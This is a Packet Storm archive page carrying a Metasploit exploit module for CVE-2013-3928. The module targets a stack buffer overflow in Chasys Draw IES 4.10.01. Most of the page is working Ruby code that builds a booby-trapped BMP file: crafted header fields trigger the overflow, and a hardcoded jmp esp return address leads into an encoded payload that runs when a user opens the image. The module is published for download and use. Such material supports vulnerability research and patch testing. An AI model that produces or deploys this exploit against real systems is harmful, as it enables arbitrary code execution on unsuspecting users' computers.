exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Chasys Draw IES Buffer Overflow

Chasys Draw IES Buffer Overflow
Posted Aug 14, 2013
Authored by juan vazquez, Javier Soez, Longinos Recuero Bustos, Christopher Gabriel | Site metasploit.com

This Metasploit module exploits a buffer overflow vulnerability found in Chasys Draw IES (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while parsing BMP files, where the ReadFile function is used to store user provided data on the stack in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted BMP file. This Metasploit module has been tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7 SP1.

tags | exploit, overflow, arbitrary, code execution
systems | windows
advisories | CVE-2013-3928
SHA-256 | 56e7fba84288627ba505da717c62532dbb987a53ddb5f03f8701ff982a5809ad

Chasys Draw IES Buffer Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT

def initialize(info={})
super(update_info(info,
'Name' => "Chasys Draw IES Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow vulnerability found in Chasys Draw IES
(version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while
parsing BMP files, where the ReadFile function is used to store user provided data
on the stack in a insecure way. It results in arbitrary code execution under the
context of the user viewing a specially crafted BMP file. This module has been
tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7
SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Christopher Gabriel', # Vulnerability Discovery
'Longinos Recuero Bustos', # PoC
'Javier \'soez\'', # PoC
'juan vazquez' # Metasploit
],
'References' =>
[
[ 'CVE', '2013-3928' ],
[ 'BID', '61463' ],
[ 'URL', 'http://secunia.com/advisories/53773/' ],
[ 'URL', 'http://longinox.blogspot.com/2013/08/explot-stack-based-overflow-bypassing.html' ]
],
'Payload' =>
{
'Space' => 21112, # Indeed there is more space available on the stack, just limited by the trigger
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1',
{
'Offset' => 65536,
'Ret' => 0x10005fd3 # jmp esp # from flt_BMP.dll v4.10.1.0
}
],
],
'Privileged' => false,
'DisclosureDate' => "Jul 26 2013",
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.bmp']),
], self.class)

end

def exploit

bof = rand_text(target['Offset'])
bof << [target.ret].pack("V")
bof << payload.encoded

bitmap_header = ""
bitmap_header << [0x28].pack("V") # HeaderSize
bitmap_header << [0x4a3].pack("V") # Width # Used to trigger the overflow
bitmap_header << [0x1].pack("V") # Height
bitmap_header << [0x9].pack("v") # Planes # Used to trigger the overflow
bitmap_header << [0x41].pack("v") # BitCount # Used to trigger the overflow
bitmap_header << [0x0].pack("V") # Compression
bitmap_header << [bof.length].pack("V") # SizeImage
bitmap_header << [0x0].pack("V") # PelsPerMeterX
bitmap_header << [0x0].pack("V") # PelsPerMeterY
bitmap_header << [0x0].pack("V") # ClrUse
bitmap_header << [0x0].pack("V") # ClrImportant

total_size = bof.length + bitmap_header.length + 14 # 14 => file header length

file_header = ""
file_header << "BM" # Signature
file_header << [total_size].pack("V") # Size
file_header << [0].pack("V") # Reserved
file_header << [0x36].pack("V") # BitsOffsets

bmp = file_header + bitmap_header + bof
file_create(bmp)
end
end

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close